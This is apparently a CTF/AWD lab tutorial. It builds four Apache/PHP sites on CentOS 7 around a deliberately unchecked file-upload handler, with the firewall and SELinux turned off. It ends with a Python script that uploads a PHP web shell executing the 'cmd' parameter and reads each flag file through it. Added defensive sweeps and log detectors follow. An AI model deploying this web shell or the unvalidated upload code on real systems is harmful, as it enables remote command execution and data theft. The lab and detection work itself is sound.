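Building a local AWD environment and attack testing (Part 1)

This post does not use Docker for the setup; the next post covers the Docker setup.

The exercise uses a file-upload vulnerability, and the environment is built on CentOS 7.

1. Create the ctf users: ctf1, ctf2, ctf3, ctf4

2. Configure the httpd file

3. Set up the PHP environment and upload.php

4. Set permissions

5. Python attack script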

I. Create the ctf users: ctf1, ctf2, ctf3, ctf4

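Generate a random string: date +%s | sha256sum | base64 | head -c 10; echo
useradd ctf1
# useradd -p expects an already-hashed password, so set the password with chpasswd
echo "ctf1:ctf1" | chpasswd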
cd /home/ctf1
mkdir www
echo "This is ctf1 index page" > /home/ctf1/www/index.html
chmod 755 /home/ctf1
chmod 755 /home/ctf1/www
chown ctf1:ctf1 /home/ctf1/www

useradd ctf2
echo "ctf2:ctf2" | chpasswd
cd /home/ctf2
mkdir www
echo "This is ctf2 index page" > /home/ctf2/www/index.html
chmod 755 /home/ctf2
chmod 755 /home/ctf2/www
chown ctf2:ctf2 /home/ctf2/www


useradd ctf3
echo "ctf3:ctf3" | chpasswd
cd /home/ctf3
mkdir www
echo "This is ctf3 index page" > /home/ctf3/www/index.html
chmod 755 /home/ctf3
chmod 755 /home/ctf3/www
chown ctf3:ctf3 /home/ctf3/www


useradd ctf4
echo "ctf4:ctf4" | chpasswd
cd /home/ctf4
mkdir www
echo "This is ctf4 index page" > /home/ctf4/www/index.html
chmod 755 /home/ctf4
chmod 755 /home/ctf4/www
chown ctf4:ctf4 /home/ctf4/www

II. Configure the httpd file

vim  /etc/httpd/conf/httpd.conf
Listen 8081

<VirtualHost *:8081>
DocumentRoot "/home/ctf1/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf1/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

Listen 8082

<VirtualHost *:8082>
DocumentRoot "/home/ctf2/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf2/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

Listen 8083

<VirtualHost *:8083>
DocumentRoot "/home/ctf3/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf3/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>


Listen 8084

<VirtualHost *:8084>
DocumentRoot "/home/ctf4/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf4/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

III. Set up the PHP environment and upload.php

Turn off the firewall and SELinux enforcement:
systemctl stop firewalld
setenforce 0
Install the PHP environment
Reference: https://www.cnblogs.com/shengChristine/p/9293996.html
yum -y install epel-release
rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum install php70w php70w-fpm php70w-cli php70w-common php70w-devel php70w-gd php70w-pdo php70w-mysql php70w-mbstring php70w-bcmath
The two upload files:
http://www.w3school.com.cn/php/php_file_upload.asp
upload.php
<html>
<body>
<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
upload_file.php
<?php
if ($_FILES["file"]["size"] < 20000)
  {
  if ($_FILES["file"]["error"] > 0)
    {
    echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
    }
  else
    {
    echo "Upload: " . $_FILES["file"]["name"] . "<br />";
    echo "Type: " . $_FILES["file"]["type"] . "<br />";
    echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
    echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    if (file_exists("upload/" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "upload/" . $_FILES["file"]["name"]);
      echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
      }
    }
  }
else
  {
  echo "Invalid file";
  }
?>

IV. Set permissions

This is mainly about the permissions on the upload directory.

Create the upload directories:
mkdir /home/ctf1/www/upload
mkdir /home/ctf2/www/upload
mkdir /home/ctf3/www/upload
mkdir /home/ctf4/www/upload
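Set the owner and group of the user folders (the owner can be either the apache user or the ctf user; set the apache user yourself if you prefer, the ctf user is used here):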
chown -R ctf1:apache /home/ctf1
chown -R ctf2:apache /home/ctf2
chown -R ctf3:apache /home/ctf3
chown -R ctf4:apache /home/ctf4
Set permissions on the upload folders:
chmod g+wx /home/ctf2/www/upload
chmod g+wx /home/ctf1/www/upload
chmod g+wx /home/ctf3/www/upload
chmod g+wx /home/ctf4/www/upload
Set as needed (files created under this folder all belong to the apache group)
chgrp apache /home/ctf1
chgrp apache /home/ctf2
chgrp apache /home/ctf3
chgrp apache /home/ctf4
Create the flags
echo "this is flag1" >> /home/ctf1/flag
echo "this is flag2" >> /home/ctf2/flag
echo "this is flag3" >> /home/ctf3/flag
echo "this is flag4" >> /home/ctf4/flag
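
An added example (not part of the original post): a Python sweep a defending team can run over the group-writable upload directories created above, reporting files the PHP handler could execute or that change per-directory settings (relevant because the vhosts use AllowOverride all). The extension list, reason strings and sample files are assumptions constructed for the example.

```python
import os
import tempfile

# Extensions commonly mapped to the PHP handler (assumed list, adjust to your httpd config).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}
PHP_TAGS = (b"<?php", b"<?=")

def sweep_upload_dir(upload_dir):
    """Return {relative_path: [reasons]} for files that could run as PHP."""
    findings = {}
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            path = os.path.join(root, name)
            reasons = []
            # Check every dot-separated part, so "x.php.jpg" is reported too.
            if SCRIPT_EXTS & set(name.lower().split(".")[1:]):
                reasons.append("script extension")
            if name == ".htaccess":
                reasons.append("per-directory override file")
            with open(path, "rb") as fh:
                head = fh.read(4096)
            if any(tag in head for tag in PHP_TAGS):
                reasons.append("PHP open tag in content")
            if reasons:
                findings[os.path.relpath(path, upload_dir)] = reasons
    return findings

def build_sample_dir():
    """Constructed sample data standing in for /home/ctfN/www/upload."""
    d = tempfile.mkdtemp(prefix="upload_sample_")
    samples = {
        "photo.jpg": b"\xff\xd8\xff\xe0 constructed image bytes",
        "shell.php": b"<?php /* constructed placeholder */ ?>",
        "avatar.php.jpg": b"\xff\xd8\xff\xe0 constructed image bytes",
        "notes.txt": b"<?= 'constructed' ?>",
        ".htaccess": b"# constructed placeholder",
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d

if __name__ == "__main__":
    for rel, why in sorted(sweep_upload_dir(build_sample_dir()).items()):
        print(rel, "->", ", ".join(why))
```

Point sweep_upload_dir at /home/ctf1/www/upload (and the other three) on the lab host to sweep the real directories.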

V. Python attack script

Upload a shell and execute a command

#coding=utf-8
"""
author: 图先生
about: http://www.youknowi.xin/
time: 2019/6/22 8:40
filename: CTF_1.py
"""
import hackhttp
import requests
hh = hackhttp.hackhttp()
raw='''
POST /upload_file.php HTTP/1.1
Host: 192.168.159.128:808{}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.128:8082/upload.php
Content-Type: multipart/form-data; boundary=---------------------------21093136245927
Content-Length: 336
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21093136245927
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@system($_GET["cmd"]);
-----------------------------21093136245927
Content-Disposition: form-data; name="submit"

Submit
-----------------------------21093136245927--
'''
# upload the file
url="http://192.168.159.128:808{}/upload_file.php"
for i in range(1,5):
    temp_raw=raw.format(str(i))
    #print(temp_raw)
    temp_url=url.format(str(i))
    code, head, html, redirect, log = hh.http(temp_url, raw=temp_raw)
    print(temp_url)
    print(code)
#cat flag
url="http://192.168.159.128:808{}/upload/shell.php?cmd=cat%20/home/ctf{}/flag"
for i in range(1,5):
    s=requests.get(url.format(str(i),str(i)))
    print(s.text)
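
The two requests the script above sends (a POST to /upload_file.php, then a GET to a script under /upload/) both show up in the httpd access log. An added example, not from the original post, that flags them from the defending side; the log lines are constructed in Apache combined format, and the client addresses and alert field names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = [
    '192.168.159.1 - - [22/Jun/2019:08:41:05 +0800] "POST /upload_file.php HTTP/1.1" 200 148 "-" "Mozilla/5.0"',
    '192.168.159.1 - - [22/Jun/2019:08:41:06 +0800] "GET /upload/shell.php?cmd=cat%20/home/ctf1/flag HTTP/1.1" 200 14 "-" "python-requests/2.22.0"',
    '192.168.159.7 - - [22/Jun/2019:08:42:10 +0800] "GET /upload/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '192.168.159.9 - - [22/Jun/2019:08:43:30 +0800] "GET /upload/shell.php?cmd=cat%20/home/ctf2/flag HTTP/1.1" 200 14 "-" "python-requests/2.22.0"',
]

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Uploaded content should be static; a script served from /upload/ is the signal.
SCRIPT_RE = re.compile(r"^/upload/.+\.(php\d?|phtml|pht|phar)$", re.I)

def detect(lines):
    """Return one alert per successful script request under /upload/."""
    uploaders, alerts = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path == "/upload_file.php":
            uploaders.add(m["ip"])
        elif SCRIPT_RE.match(url.path) and m["status"] == "200":
            params = dict(parse_qsl(url.query))  # values are percent-decoded
            alerts.append({
                "ip": m["ip"], "time": m["ts"], "path": url.path, "params": params,
                # Same client posted to the upload handler earlier in the log.
                "uploaded_first": m["ip"] in uploaders,
                "touches_flag": any("/flag" in v for v in params.values()),
            })
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

An alert with uploaded_first set to False means a client is using a script that someone else placed in the directory, which is the case to check first during a round.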

2019.7.16